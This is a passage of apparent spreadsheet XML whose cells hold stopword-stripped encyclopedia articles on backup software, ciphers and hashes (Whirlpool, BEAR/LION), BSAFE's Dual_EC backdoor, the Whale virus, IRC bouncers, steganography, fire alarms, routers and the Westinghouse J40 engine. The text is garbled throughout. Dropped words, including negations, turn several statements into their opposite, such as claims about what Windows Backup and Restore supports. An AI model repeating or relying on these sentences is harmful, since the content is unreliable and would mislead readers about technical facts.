number days) dates generation generation preceding using larger exponent leads uniform distribution generations, whereas smaller exponent leads distribution recent fewer older generations. this technique probabilistically ensures past generations always distributed across points time desired. weighted random method advantage systematic approach, backups irregular missed. incremented media method this method many variations names. numbered media used cycle. then cycle repeated using media numbered previous cycle, incremented one. lowest numbered tape previous cycle retired kept permanently. thus access every backup cycle backup cycle that. this method advantage ensuring even media wear, requires schedule precalculated. also off-site data protection legal hold references</t>
  </si>
  <si>
    <t>Backup and Restore</t>
  </si>
  <si>
    <t>backup restore (formerly backup restore center) primary backup component windows vista windows create file folder backups, well system images backups, used recovery event data corruption, hard disk drive failure, malware infection. replaces ntbackup, part windows since windows 3.51. unlike predecessor, supports cds, dvds, blu-rays discs backup media. backup restore offers file folder backup editions windows. full features available high-end editions windows, i.e., professional, business, enterprise, ultimate editions. microsoft deprecated backup restore windows 8.0, recommending file history file-based backup third-party solution system imaging. despite deprecation, however, part versions windows released thereafter. windows server counterpart backup restore called windows server backup. backup types backup restore supports different types backup: file folder backup, system image. file folder backup backup restore create backup copies individual files folders. these backups saved files. methods file backup supported. first, normal backup, stores everything selected backup. second, incremental backup stores files changed previous backup. file backup windows vista allow users choose specific files, locations, users back instead, backs content users based categories: audio tracks, compressed files, documents, email, photos, recorded television shows, videos, additional user files. users choose whether perform backup certain category. microsoft hoped simplistic approach would prove appealing users easily appalled long tree checkboxes."file backup windows presents options operation: choose, allows users perform backups specific folders, libraries, create system image; windows choose, creates backups personal data user folders libraries, also creates system image. system image method backup, called complete backup windows vista system image windows block-by-block disk image system, saved file. block-based backup efficient performing subsequent differential backups, blocks changed need backed however, backup restore also create system images disks formatted ntfs file system.one could later restore windows recovery environment. beginning windows vista sp1, system images restored machine different motherboard, different disk controller, target machine must number disks.alternatively, could mount image virtual disk, allowing extraction individual files. mounted virtual disk features actual volume, meaning previous versions feature windows available windows enterprise ultimate, also possible boot file. finally, hypervisors hyper-v, vmware workstation, oracle virtualbox support disk format, possible backups virtual machines. backup targets backups could stored root storage device backed network share. however, backup restore support backing subfolder volume. also supports cds, dvds, blu-ray discs backup destinations, support tape drives.windows server backup windows server 2008 support hard disk drives large sector sizes (4096 bytes) unless support byte emulation. operation backup restore frontend interfacing user. backend component windows service called windows backup. this service runs independent user sessions perform scheduled backups even users logged onto system. scheduled backups, default, every sunday p.m.during backup, windows uses volume shadow copy service (vss) ensure files changed backed ensures file system-level consistency app-level consistency apps registered writers. windows vista windows another windows component called system restore also uses vss. such, system restore shadow copies backup restore created full system backup.as mentioned above, backup restore merely frontend. windows ships alternative frontend windows backup, wbadmin command-line utility. only member administrators groups backup operators group wbadmin. edition comparison home basic edition windows perform manual file backups. home premium later editions automate file backups, create file backups network locations, create backup schedules, perform incremental backups files. professional, business, enterprise, ultimate editions support system image shadow copy. user interface complete backup windows vista support creating system image network location; however, wbadmin command perform operation. unlike windows vista home premium, however, backing files network share available windows home premium. windows provides user interface option create system image network location. deprecation with release windows microsoft deprecated backup restore favor file history feature. microsoft cited contributing factor deprecation, though company retained functionality users relied feature moved windows file recovery control panel applet previous points access removed. windows 8.1, interface functionality—with exception system image creation, system image backup option file history—were removed. scheduling system image backups supported either. wbadmin, however, remained available. mentioned above, backup restore, wbadmin merely frontends windows backup service.) with release windows backup restore (windows control panel applet made available again. file history remains default preferred method back local content windows system image functionality, microsoft recommends using third-party software. references external links filing cabinet: storage team blog file services storage features windows</t>
  </si>
  <si>
    <t>BEAR and LION ciphers</t>
  </si>
  <si>
    <t>bear lion block ciphers invented ross anderson biham combining stream cipher cryptographic hash function. algorithms large variable block size, order bits more. both 3-round generalized (alternating) feistel ciphers, using hash function stream cipher round functions. bear uses hash function twice independent keys, stream cipher once. lion uses stream cipher twice hash function once. inventors proved attack either bear lion recovers would break stream cipher hash. references ross anderson biham. "two practical provably secure block ciphers: bear lion" (pdf). retrieved 2007-01-13. {{cite journal}}: cite journal requires |journal= (help) morin (1996). provably secure efficient block ciphers. selected areas cryptography. archived original (postscript) 2011-07-06. retrieved 2009-01-09. morin (1996). "provably secure efficient block ciphers". citeseerx 10.1.1.5.4378. {{cite journal}}: cite journal requires |journal= (help)</t>
  </si>
  <si>
    <t>BEAST (security exploit)</t>
  </si>
  <si>
    <t>Whirlpool (hash function)</t>
  </si>
  <si>
    <t>computer science cryptography, whirlpool (sometimes styled whirlpool) cryptographic hash function. designed vincent rijmen (co-creator advanced encryption standard) paulo barreto, first described 2000. hash recommended nessie project. also adopted international organization standardization (iso) international electrotechnical commission (iec) part joint iso/iec 10118-3 international standard. design features whirlpool hash designed square block cipher, considered family block cipher functions. whirlpool miyaguchi-preneel construction based substantially modified advanced encryption standard (aes). whirlpool takes message length less 2256 bits returns 512-bit message digest.the authors declared "whirlpool (and never patented. used free charge purpose." version changes original whirlpool called whirlpool-0, first revision whirlpool called whirlpool-t latest version called whirlpool following test vectors. first revision 2001, s-box changed randomly generated good cryptographic properties better cryptographic properties easier implement hardware. second revision (2003), flaw diffusion matrix found lowered estimated security algorithm potential. changing rotating matrix constants solved issue. internal structure whirlpool hash function merkle–damgård construction based aes-like block cipher miyaguchi–preneel mode.the block cipher consists state matrix {\displaystyle bytes, total bits. encryption process consists updating state four round functions rounds. four round functions subbytes (sb), shiftcolumns (sc), mixrows (mr) addroundkey (ak). during round state computed {\displaystyle s=ak\circ mr\circ sc\circ sb(s)} subbytes subbytes operation applies non-linear permutation (the s-box) byte state independently. 8-bit s-box composed smaller 4-bit s-boxes. shiftcolumns shiftcolumns operation cyclically shifts byte column state. column bytes shifted downwards positions. mixrows mixrows operation right-multiplication matrix {\displaystyle gf({2^{8}})} matrix chosen branch number important property looking resistance differential cryptanalysis) maximal. addroundkey addroundkey operation uses bitwise calculated schedule current state. schedule identical encryption itself, except addroundkey function replaced addroundconstant function adds predetermined constant round. whirlpool hashes whirlpool algorithm undergone revisions since original 2000 specification. people incorporating whirlpool likely recent revision whirlpool; known security weaknesses earlier versions whirlpool, recent revision better hardware implementation efficiency characteristics, also likely secure. mentioned earlier, also version adopted iso/iec 10118-3 international standard. 512-bit (64-byte) whirlpool hashes (also termed message digests) typically represented 128-digit hexadecimal numbers. following demonstrates 43-byte ascii input (not including quotes) corresponding whirlpool hashes: even small change message (with extremely high probability {\displaystyle 1-10^{-154}} result different hash, usually look completely different like unrelated random numbers following demonstrates result changing previous input single letter single bit, even, ascii-compatible encodings), replacing hash zero-length string implementations authors provide reference implementations whirlpool algorithm, including version written version written java. these reference implementations released public domain. adoption first widely used mainstream cryptographic programs started using whirlpool freeotfe, followed truecrypt 2005.veracrypt fork truecrypt) included whirlpool (the final version) supported hash algorithms. also digital timestamping references external links whirlpool hash function wayback machine (archived 2017-11-29) jacksum sourceforge, java implementation three revisions whirlpool whirlpool github open source implementation latest revision whirlpool matlab implementation whirlpool hashing function rhash, open source command-line tool, calculate verify whirlpool hash. perl whirlpool module cpan digest module implementing whirlpool hashing algorithm ruby ironclad common lisp cryptography package containing whirlpool implementation iso/iec 10118-3:2004 standard test vectors whirlpool hash nessie project managed implementation python whirlpool module</t>
  </si>
  <si>
    <t>Wheelock (brand)</t>
  </si>
  <si>
    <t>wheelock fire alarm general signaling products manufacturer owned eaton corporation. history some earliest signals produced wheelock series ac-powered, dual-projector electromechanical horns. early 1970s, wheelock introduced (ac-powered) (dc-powered) series electromechanical horns. around 1976, wheelock created 7001 (2-wire, flush-mount dc), 7002 (2-wire, surface-mount dc), 34+ws (4-wire, surface-mount dc), 7004 (2-wire, surface-mount electromechanical horn/strobes. these first fire alarm signals xenon strobes instead incandescent lights. signals either pigtail connectors screw terminals power-up. models screw terminals letter model numbers (e.g. 34t, 7002t). horn strobe 7001 7002 models wired series, causing horn produce distinctive "skipping" sound strobe flashes. 1985, wheelock redesigned horn's grilles, making vandal resistant; shortly thereafter, pigtail wires discontinued. this product line became extremely popular among third-party security companies, honeywell, ademco, cerberus pyrotronics (now part siemens ag). 1994, wheelock discontinued series, low-intensity strobes meet light distribution requirements ada. still production today general signaling purposes. (the requirements fire alarm signal however, placed strobe plate without issue.) cooper wheelock also produces several bells well speakers, synchronization modules, booster power supplies, chimes voice evacuation products. cooper wheelock manufacture fire alarm control panels, smoke detectors, heat detectors, pull stations. many fire alarm control panels compatible cooper wheelock's line notification appliances products. wheelock also produces notification devices siemens building technologies fire alarm systems cerberus modular. these notification devices manufactured siemens device, major tweaks syncing (possibly allow older siemens devices, like u-mcs series example, notification appliance circuit), rebranding devices. examples products wheelock makes siemens include z-series series), series (se, seh, sefh series), led3 series series), more, exception exceeder xenon (st, series). products series (multi-tone) introduced 1993. features eight different tones including continuous horn, code-3 horn, march time horn, code-3 tone, siren, slow whoop, hi-lo, bell. these could using switches back horn. however, tones grab attention bystanders. commonly used tones continuous horn, code-3 horn, march time horn. seen different strobe types time, including translucent vertical strobes, transparent vertical strobes, transparent horizontal strobes(used weatherproofed models). transparent horizontal strobe design introduced 2002, still used day. 1995, wheelock introduced combination horn strobe. first created vertical position strobe right side horn, except candela models, used horizontal strobe. 1998 introduced, strobe models moved horn horizontally regardless many candelas like current wheelock strobes better light output. 2021 still manufactured weatherproof applications. 1998, wheelock released series. similar except design much less boxy, piezoelectric speaker disc slightly visible grill also updated horn. uses strobe similar line. strobe replaced vertical lsm, syncable strobe series, since horizontal strobe allows greater coverage. they also introduced rssp, retrofit plate allows easy addition strobe older electromechanical horns bells. march, 2006, wheelock, acquired cooper industries. later 2006, wheelock introduced zns, zrs, horn/strobes, remote strobes, remote horns. horn circuitry features "snap-on" mounting system, allows base installed horn attached. 2021, z-series still produced exclusively siemens series. 2008 wheelock introduced exceder line horn/strobes, remote strobes, remote horns. this product line essentially style update zns. this alarm also features "snap-on" mounting system zns. march 2010, (non-weatherproof), z-series products discontinued replaced exceder series. 2012, wheelock updated exceder series introducing industry's first notification appliances. this alarm compact (single gang) design. however feature "snap-on" mounting system small size device. horn circuitry original exceder. then 2013 wheelock began making exceder speaker strobes exceder ceiling mount version.in 2020, wheelock announced family notification appliances, named "eluxa", shared similar design exceder led3 series, however, notification appliances design altered accommodate larger module, engineered offer strobe intensity ratings 110, 135, candela wall models, 110, ceiling mount models, well notification appliances re-engineered include mounting plate, like exceder xenon zns/zrs (zr/zh siemens). types devices include horns, horn strobes, strobes, frequency sounder strobes, frequency sounders, speaker strobes speakers. references external links cooper wheelock cooper wheelock products eaton alarms signaling devices</t>
  </si>
  <si>
    <t>Whale (computer virus)</t>
  </si>
  <si>
    <t>whale virus computer virus discovered july 1990. file size, 9,216 bytes, time largest virus ever discovered. known using several advanced "stealth" methods. description after file becomes resident system memory 640k boundary, operator experience total system slow result virus' polymorphic code. symptoms include video flicker screen writing slowly. files seem "hang" even though eventually execute correctly. this product total system slow within system's memory. reported infected program displayed following message run: whale search fish '~knzyvo}' hamburg addr error d9eb,02 shifting letters "~knzyvo}" left ascii table characters turns string "tadpoles". also computer virus comparison computer viruses references external links mcafee virus description f-secure virus description</t>
  </si>
  <si>
    <t>BNC (software)</t>
  </si>
  <si>
    <t>(short bounced network connection) piece software used relay traffic connections computer networks, much like proxy. using allows user hide original source user's connection, providing privacy well ability route traffic specific location. also used hide true target user connects. common usage internet relay chat (irc) running remote servers. environment, easy ascertain user's address help hide original connection source, well providing opportunity "vhosts" "virtual hosts". vhost conceal connection better merely adds statement hostname. many bncs remain connected server event client disconnect internet. often state changes tracked relayed client upon reconnection. some implementations store messages sent across network client would normally received send upon client's reconnection; often considered much resource dependent commercial hosting services provide. other logging features like functions included various implementations standard. example user logs onto directly appears user!user@users.reverse.dns user logs onto indirectly appears user!user@bnc.net software list bouncer software. proxy maintains persistent connection shows backlog reconnect. original bouncer. ezbounce's features include password protection, remote administration, logging listening multiple ports. jbouncer irc, written java. supports logging. smart versatile irc-bouncing tool also soon launched, guarding attempting one's nick. psybnc said oldest well-known bouncer. easy use, runs linux became popular freebsd, supports ipv4, ipv6, ssl, logging, multiple users networks etc. although psybnc like proxy, often installed compromised systems attacker. shroudbnc (irc) supports connections offers interface. (irc) easy use, supports connections, ipv6 logging offers interface. extendible modules scripts c++, python, perl tcl. bouncer written java generic bouncer/proxy. supports tunneling, failover loadbalancing destinations. dircproxy lounge acts like bouncer progressive (pwa) client combined. open source. soju simple easy-to-configure bouncer. project hosted sourcehut. bncs also often used file transfer protocol (ftp), hide user server route traffic specific location. bouncers divided different categories, entry traffic. entry bouncer acts gateway server, hide existence actual server. entry bouncers, like cubnc, used multi-server setup easy access server load balancing. this removes need select server into, trying access server farm. traffic bouncers relay traffic host installed used, appears bouncer actually server, thus hiding real location server completely. multiple traffic bouncers installed parallel order balance traffic load across different links. most elaborate bouncers even bounce secure ssl/tls connections. also proxy open proxy references external links (software) curlie</t>
  </si>
  <si>
    <t>BPCS-steganography</t>
  </si>
  <si>
    <t>bpcs-steganography (bit-plane complexity segmentation steganography) type digital steganography. digital steganography hide confidential data (i.e. secret files) securely embedding media data called "vessel data." vessel data also referred "carrier, cover, dummy data". bpcs-steganography true color images (i.e., 24-bit color images) mostly used vessel data. embedding operation practice replace "complex areas" planes vessel image confidential data. important aspect bpcs-steganography embedding capacity large. comparison simple image based steganography uses solely least important data, thus (for 24-bit color image) embed data equivalent total size, bpcs-steganography uses multiple bit-planes, embed much higher amount data, though dependent individual image. 'normal' image, roughly data might replaceable secret data image degradation becomes apparent. principle embedding human visual system special property too-complicated visual pattern perceived "shape-informative." example, flat beach shore every single square-foot area looks sandy area, shape observed. however, look carefully, same-looking areas entirely different sand particle shapes. bpcs-steganography makes property. replaces complex areas bit-planes vessel image complex data patterns (i.e., pieces secret files). this replacing operation called "embedding." difference vessel images embedding operation. issue arises data embedded appears visually simple information, simple information replaces complex information original image create spurious 'real image information'. case data passed [binary image conjugation transformation], order create reciprocal complex representation. present status research development this form steganography proposed jointly eiji kawaguchi richard eason 1998. their experimental program (titled qtech hide view) freely available educational purposes. recently, many researchers tackling algorithm improvement applications well resistibility studies steganalysis. also references concept digital picture envelope internet communication model anonymous covert mailing system using steganographic scheme model unforgeable digital certificate document system bpcs steganography using encoded images high capacity data hiding system using bpcs steganography steganography using bpcs integer wavelet transformed image external links invitation bpcs-steganography english) invitation bpcs-steganography japanese)</t>
  </si>
  <si>
    <t>Wet stacking</t>
  </si>
  <si>
    <t>stacking condition diesel engines unburned fuel passes exhaust system. word "stacking" comes term "stack" exhaust pipe chimney stack. oily exhaust pipe therefore "wet stack". this condition several causes. common cause idling engine long intervals, generate enough heat cylinder complete burn. "idling" running full rated operating speed, little load applied. another excessive fueling. that caused weak leaky injectors, fuel settings turned high fueling given rpms. cold weather running causes prevent engine reaching proper operating temperature cause buildup fuel incomplete burn result 'wet stacking'. diesel generators, usually diesel engine running small percentage rated output. efficient combustion, diesel engine least cent rated power output.wet stacking detectable presence black ooze around exhaust manifold, piping turbocharger, fitted. mistaken lubricating cases, consists "heavy ends" diesel fuel burn combustion temperature low. heavier, oily components diesel fuel contain stored energy comparable quantity say, gasoline, diesel requires adequate loading engine order keep combustion temperature high enough make often, hear slight miss engine fuel buildup. when engine first placed load long periods idling stacking, blow black exhaust burns excess fuel off. continuous black exhaust stack constant load also indication fuel burned. additionally, stacking results build diesel fuel engine combust temperature engine. this results reduced fuel economy. this fuel leaks cylinders dilutes engine oil. frequently changed, diluted lead increased wear cylinder premature engine failure. extreme cases, stacking results stack fires. also crankcase dilution rolling coal, modifying engine intentional stacking references</t>
  </si>
  <si>
    <t>BSAFE</t>
  </si>
  <si>
    <t>dell bsafe, formerly known bsafe, fips 140-2 validated cryptography library, available java. bsafe initially created security, purchased then, turn, dell. when dell sold business symphony technology group 2020, dell elected retain bsafe product line. bsafe common encryption toolkits patent expired september 2000. also contained implementations ciphers, common rc4. from 2004 2013 default random number generator library nist-approved standard, widely known insecure least 2006, containing kleptographic backdoor american national security agency (nsa), part secret bullrun program. 2013 reuters revealed received payment million compromised algorithm default option. standard subsequently withdrawn 2014, removed bsafe beginning 2015. cryptography backdoors dual_ec_drbg random number generator from 2004 2013, default cryptographically secure pseudorandom number generator (csprng) bsafe dual_ec_drbg, contained alleged backdoor nsa, addition biased slow csprng. cryptographic community aware dual_ec_drbg poor csprng since shortly specification posted 2005, 2007 become apparent csprng seemed designed contain hidden backdoor nsa, usable secret key. 2007, bruce schneier described backdoor "too obvious trick anyone it." backdoor confirmed snowden leaks 2013, insinuated paid security us$10 million dual_ec_drbg default 2004, though security denied knew backdoor 2004. reuters article revealed secret million contract dual_ec_drbg described deal "handled business leaders rather pure technologists". security largely declined explain choice continue using dual_ec_drbg even defects potential backdoor discovered 2006 2007, denied knowingly inserting backdoor. would pick dual_ec default? dual_ec hilariously slow real performance implications shown plain random number generator back 2006. 2007, shumow ferguson raised possibility backdoor specification, sensible cryptographer would near thing. killer employs number highly distinguished cryptographers! it's unlikely they'd miss news dual_ec. cryptographically secure random number generator often basis cryptography, much data encrypted bsafe secure nsa. specifically shown backdoor makes ssl/tls completely breakable party private backdoor (i.e. nsa). since government companies also used vulnerable bsafe, potentially made data less safe, nsa's secret backdoor stolen. also possible derive secret solving single instance algorithm's elliptic curve problem (breaking instance elliptic curve cryptography considered unlikely current computers algorithms, breakthrough occur). june 2013, edward snowden began leaking documents. november 2013, switched default hmac drbg sha-256 default option. following month, reuters published report based snowden leaks stating received payment million dual_ec_drbg default.with subsequent releases crypto-c micro edition 4.1.2 (april 2016), micro edition suite 4.1.5 (april 2016) crypto-j (march 2015), dual_ec_drbg removed entirely. extended random extension "extended random" proposed extension transport layer security (tls) protocol, submitted standardization ietf employee, although never became standard. extension would otherwise harmless, together dual_ec_drbg, would make easier take advantage backdoor.the extension previously known enabled implementations, december 2017, found enabled canon printer models, bsafe library, extension number conflicted part version 1.3. varieties crypto-j java encryption library. 1997, data security licensed baltimore technologies' j/crypto library, plans integrate part jsafe encryption toolkit released first version jsafe year. jsafe featured january 1998 edition byte magazine. cert-j public infrastructure software library, written java. contains cryptographic support necessary generate certificate requests, create sign digital certificates, create distribute certificate revocation lists. cert-j 6.2.4, entire deprecated favor similar functionality provided bsafe crypto-j api.bsafe crypto-c micro edition (crypto-c initially released june 2001 name "rsa bsafe wireless core 1.0". initial release targeted microsoft windows, epoc, linux, solaris palm bsafe micro edition suite cryptography bsafe micro edition suite initially announced february 2002 combined offering bsafe ssl-c micro edition, bsafe cert-c micro edition bsafe crypto-c micro edition. both ssl-c micro edition cert-c micro edition reached september 2014, micro edition suite remains supported crypto-c micro edition fips-validated cryptographic provider.ssl-c toolkit bsafe suite. originally written eric young hudson, fork open library ssleay, developed prior joining rsa. ssl-c reached life december 2016.ssl-j java toolkit implements tls. ssl-j released part jsafe initial product offering 1997. crypto-j default cryptographic provider ssl-j. product suite support status november 2015, announced life (eol) dates bsafe. primary support (eops) reached january 2017, extended support (eoxs) originally january 2019. that date later extended versions january 2022. during extended support, even though support policy stated severe problems would patched, versions released containing bugfixes, security fixes algorithms.on december 2020, dell announced reversal rsa's past decision, allowing bsafe product support beyond january 2022 well possibility soon acquire licenses. dell also announced rebranding toolkits dell bsafe. references external links bsafe cert-j support page bsafe crypto-j support page bsafe ssl-j support page bsafe crypto-c micro edition support page bsafe micro edition suite support page</t>
  </si>
  <si>
    <t>BSD Authentication</t>
  </si>
  <si>
    <t>authentication, otherwise known auth, authentication framework software employed openbsd accompanying software openssh. originated bsd/os, although specification implementation donated freebsd project bsdi, openbsd chose adopt framework release 2.9. pluggable authentication modules (pam) serves similar purpose operating systems linux, freebsd netbsd. auth performs authentication executing scripts programs separate processes requiring authentication. this prevents child authentication process interfering parent except narrowly defined inter-process communication api, technique inspired principle least privilege known privilege separation. this behaviour significant security benefits, notably improved fail-safeness software, robustness malicious accidental software bugs. also name service switch references external links authenticate(3): simplified interface authentication system openbsd library functions manual auth_subr(3): interface authentication system openbsd library functions manual</t>
  </si>
  <si>
    <t>BestCrypt</t>
  </si>
  <si>
    <t>bestcrypt, developed jetico, commercial disk encryption available windows, linux, macos android.bestcrypt comes editions: bestcrypt volume encryption encrypt entire disk volumes; bestcrypt container encryption encrypt virtual disks stored computer files.bestcrypt also provides complimentary data erasure utility bcwipe. cryptographic algorithms bestcrypt supports wide variety block cipher algorithms including aes, serpent, blowfish, twofish, des, triple des, gost 28147-89. ciphers support modes operation aes, twofish serpent also support mode. features create mount virtual drive encrypted using aes, blowfish, twofish, cast-128 various encryption methods. bestcrypt higher alternatively mount subfolder ntfs disk instead drive. encrypted virtual disk images compatible across windows, linux encrypt files single, self-extracting archive. transparently encrypt entire partitions volumes together pre-boot authentication encrypted boot partitions. two-factor authentication. support size-efficient dynamic containers smart free space monitoring technology. hardware accelerated encryption. anti-keylogging facilities protect container volume passwords. data erasure utility bcwipe erase unprotected copies data complement encryption. secret sharing public authentication methods addition basic password-based authentication. also comparison disk encryption software references further reading external links official website</t>
  </si>
  <si>
    <t>BSD checksum</t>
  </si>
  <si>
    <t>checksum algorithm commonly used, legacy checksum algorithm. implemented also available command line utility. this algorithm useless security perspective, weaker crc-32 cksum error detection. computation checksum below relevant part source code (gpl licensed). computes 16-bit checksum adding bytes (8-bit words) input data stream. order avoid many weaknesses simply adding data, checksum accumulator circular rotated right step char added. description algorithm mentioned above, algorithm computes checksum segmenting data adding accumulator circular right shifted summation. keep accumulator within return value bounds, bit-masking done. example: calculating 4-bit checksum using 4-bit sized segments (big-endian) input: 101110001110 three segments: 1011, 1000, 1110. iteration segment: 1011 checksum: 0000 bitmask: 1111 apply circular shift checksum: 0000 0000 checksum segment together, apply bitmask onto obtained result: 0000 1011 1011 1011 1111 1011 iteration segment: 1000 checksum: 1011 bitmask: 1111 apply circular shift checksum: 1011 1101 checksum segment together, apply bitmask onto obtained result: 1101 1000 10101 10101 1111 0101 iteration segment: 1110 checksum: 0101 bitmask: 1111 apply circular shift checksum: 0101 1010 checksum segment together, apply bitmask onto obtained result: 1010 1110 11000 11000 1111 1000 final checksum: 1000 references sources official freebsd source code official manual page coreutils download page find unpack newest version coreutils package, read src/sum.c</t>
  </si>
  <si>
    <t>BT Smart Hub</t>
  </si>
  <si>
    <t>smart (formerly home hub) family wireless residential gateway router modems distributed products services wholesale resellers (i.e. llus) internet services. since home/smart hubs support faster wi-fi 802.11ac standard, addition 802.11b/g/n standards. models home prior home support voip internet telephony bt's broadband talk service, compatible dect telephone handsets. since home models dual band (i.e. ghz). home works defunct fusion service vision video demand service. home 1.0, devices connect internet using standard adsl connection. home models support pppoa adsl pppoe vdsl2, conjunction openreach-provided vdsl2 modem support bt's fttc network infinity). version home hub, released august 2013, includes vdsl2 modem fibre-optic connections. firmware pushed home hubs connected internet automatically home followed june 2016 smart hub, development home hub, internally referred "home wifi antennas predecessor. supports wave 802.11ac wifi, found review faster non-wave smart subsequently replaced smart (home 6dx). history prior release home (2004–2005), offered product based 2wire 1800hg, manufactured 2wire. this described wireless 1800hg", documentation wireless home 1800". this provided connection, four ethernet ports wi-fi 802.11b 802.11g wireless connection. total devices combination supported.the home manufactured huawei also supports adsl2+. home powered highly integrated broadcom bcm6361 system-on-a-chip (soc). bcm6361 dual mips32 core processor well integrated analog front (afe) line driver, gigabit ethernet switch controller 802.11 wi-fi transceiver. features home combined wireless router phone. supports 802.11b/g/n wireless networking standards, security protocols. supports many bt's services fusion, vision broadband anywhere. also used voip phone broadband talk. home incorporated functionality, seen routers, enables user connect encrypted network "one touch" button, also includes "smart wireless technology", automatically chooses wireless channel give strongest possible wireless signal. since (temporarily) disabled firmware updates security issues standard. home supports port forwarding.the home versions used access files stored attached stick supported. server default address file://192.168.1.254 available entire network.the smart (initially branded home upgraded wifi provision wave 802.11ac specification, increased number antennae improved mimo. ultra smart appeared visually similar smart hub, featured g.fast capable modem included bs6312 socket subscribers digital voice attach analogue telephone. digital voice launched january 2020 replacement analogue voice service, planned turned 2025. smart provided technical features ultra smart redesigned body, well supporting bt's "complete wifi" mesh product. phone phone optional handset bought work conjunction home 1.5, 2.0. calls using broadband talk service, dock front home used stand. uses hi-def sound technology calls phones made. dect telephone used instead. with home released 2.0, phone model made accompany home 1.0: supplied phone 1010 home 1.5: supplied phone 1020 (the difference 1010 1020 lack colour screen supporting features 1020.) home 2.0: supplied phone home work broadband talk service dect telephones. after january 2011, broadband talk longer provided part bt's broadband packages.the phones partially compatible newer older versions hub, able make receive calls, loss features including call waiting, call transfer, internal calls, phonebook, call lists hi-def sound. design 2019 following versions home/smart released: version 0.5: grey phone available, technically home rather fusion hub) version 1.0: white (matching phone available) version 1.5: white black (matching phone available) version 2.0: black (matching black phone available) version 3.0: black (hub phones dect phones compatible) released january 2011. version 4.0: black (hub phones dect phones compatible) released 2013. version (hh5a/5b): black, released mid-october 2013 smart (home /6b), mid-2016 smart (home 6dx), early 2019there different versions home 2.0: v2.0a (2.0 type manufactured thomson, v2.0b (2.0 type manufactured gigaset communications (now sagem communications, sagem acquired gigaset's broadband business july 2009). whilst looks functionality appear identical, home 2.0a plagued problems relating poorly tested firmware upgrades which, amongst problems, cause home 2.0a restart uploading files using wireless connection. there also versions home gigaset, sagem) v3b, (huawei). home used total broadband package without modification; 1.0, 1.5, versions unlocked. home configuration software compatible macintosh windows operating systems, although optional computers without software still able connect browse internet normally. generation home released 2013. built smart dual band technology, making unique amongst uk-based provided routers. home supplied free charge customers, charge existing customers. intelligent power management technology monitors functions puts individually power-save mode use. there variants type generation home released mid-october 2013 upgrade home gigabit ethernet connections, 802.11ac wi-fi (wave integrated vdsl modem. customers upgrading adsl broadband delivery charge; existing broadband customers upgrade charge. there variants type lantiq chipset (eci), type broadcom. possible replace firmware type (and identical 'plusnet one' business type openwrt, unlocking providing features openwrt. april 2018, scripts modifying stock firmware type enable access, published github repository; enables access native openrg command-line interface. models technical specifications home package includes: broadband cable (rj11 rj11) ethernet cable (rj45 rj45) (cat5e) power adapter adsl microfilters phone rj11 converter user guide lead provided home only. reported issues security older home questionedin 2017, reported many smart customers suffering problems router constantly rebooting unable maintain reliable internet connection.in 2021, reported smart router [was] 'disrupting' home networks references external links official home page</t>
  </si>
  <si>
    <t>Westinghouse J40</t>
  </si>
  <si>
    <t>westinghouse early high-performance afterburning turbojet engine designed westinghouse aviation turbine division starting 1946 navy bureau aeronautics (buaer) request. buaer intended design several fighter aircraft bomber. however, early low-power design successful, attempts scale full design power failed, design finally abandoned, deemed "fiasco" "flop". design originally called engine 7,500 thrust level static conditions without afterburner 10,900 thrust afterburner. powerful model 9,500/13,700 thrust version intended replace earlier engines various airframes. total, thirteen different variations planned. projected need higher-power engines buaer place second source production contract ford motor company, lincoln mercury division j40-we-10 j40-we-12 engines. higher-powered versions proved flawed compressor design lacked suitable control system. this left navy earlier, lower-power engines. these eventually used early flight testing, proved largely unusable. particularly notorious mcdonnell f3h-1n demon, proved dangerously underpowered smaller engines. design quickly grounded repeated incidents caused flying overweight airframe number engine failures loss aircraft. government investigation f3h-1n program issue failed determine pilots lost solely engine issues. grounded airframes either scrapped used ground training. f3h-2n used allison engine. program terminated 1955, time aircraft power either grounded, cancelled redesigned alternative engines. j40's failure among affected military programs. program failure primarily lack investment research experimental resources westinghouse, leaving unable resolve issues various models engines. 1953 westinghouse worked rolls-royce offer engines based avon, similar performance matured excellent design even higher output. westinghouse aircraft engine business 1965 6,200 thrust, scaled-down version 12,000 avon 300-series engine, xj54, also failed find united states market. would also replace, u.s. navy, disastrous westinghouse never fully materialized acceptable form development westinghouse electric corporation established westinghouse aviation turbine division (agt) 1945. along general electric, westinghouse extensive experience turbine design lead established aviation engine manufacturers, little experience entirely design concepts. while early engines redesigned versions british jets, first truly american-designed turbojet run, mcdonnell phantom. enlarged obsolete introduced, moderately successful. design following rapid industry progress needed. represented opportunity westinghouse become prominent player turbojet engine market. u.s. navy showed great confidence company success failure generation jets westinghouse three engine companies. june 1947 navy's bureau aeronautics contracted development. prototype engine first november 1948. according article april 1949 edition naval aviation confidential bulletin lieutenant commander neil harkleroad bureau aeronautics power plant division, "the engine operating successfully date." writing, 50-hour flight substantiation test accomplished june 1949 150-hour qualification test december 1949. designed deliver twice thrust engines currently service, allowing j40-we-8 afterburner power many navy carrier-based fighters single engine. these included grumman xf10f jaguar variable-sweep wing general-purpose fighter, mcdonnell demon douglas skyray interceptors. growth 15,000 thrust afterburner projected. version without afterburner, j40-we-6, power douglas a-3d skywarrior twin-engine carrier-based bomber. j40-8 little inches (1,000 diameter feet (7.6 long, accessories including afterburner. weighed almost 3,500 pounds (1,600 kg), almost feet (2.1 shorter pounds (270 lighter, afterburner. 1949, higher-power j40-we-12 non-afterburning version developing 9,500 thrust, better fuel consumption, proposed a3d, afterburning version (j40-we-10) developing 13,700 thrust proposed fighter projects. both versions accepted became engines airframes designed use. lower-powered early development models intended used ground initial flight testing high-powered engines became available. decommission development engine protracted. all-important 150-hour qualification test accomplished december 1949 completed january 1951, year behind schedule. afterburner particularly troublesome afterburning version engine, j40-we-8, pass 150-hour qualification august 1952. result, j40-we-6 engines without afterburners used initial testing, causing delays flight test programs. early even low-powered versions engine considered unusable reliability problems. would prove successful alternate engines, f3h-1 relegated subsonic performance using lower-powered engine continued subsonic even substitution higher-power allison j71. stated, although considered failures, f3h-1 could competitive early supersonic force's century series fighters original engines delivered design specifications. fact, demon emerged development missile-armed all-weather fighter 8,000 (3,600 heavier xf3h-1 been, even high-powered could restore performance. f3h-1n demon single-engine fighter initially severe disappointment, unreliability difficulties flying much heavier airframe lower-powered j40-we-22a engines. airframe design assumed higher-powered j40-we-10 would power plant. these first production demons grounded redesign accept engine loss aircraft four pilots. decision move demon occurred long initial production batch emerged development suitable afterburner protracted, buaer decided accept early aircraft westinghouse j40-we-22a engines. this decision came congressional review 1955 drew sharp criticism congress. time magazine called navy's grounding westinghouse-powered f3h-1 demons "fiasco", unflyable planes, could used navy ground training loss $200 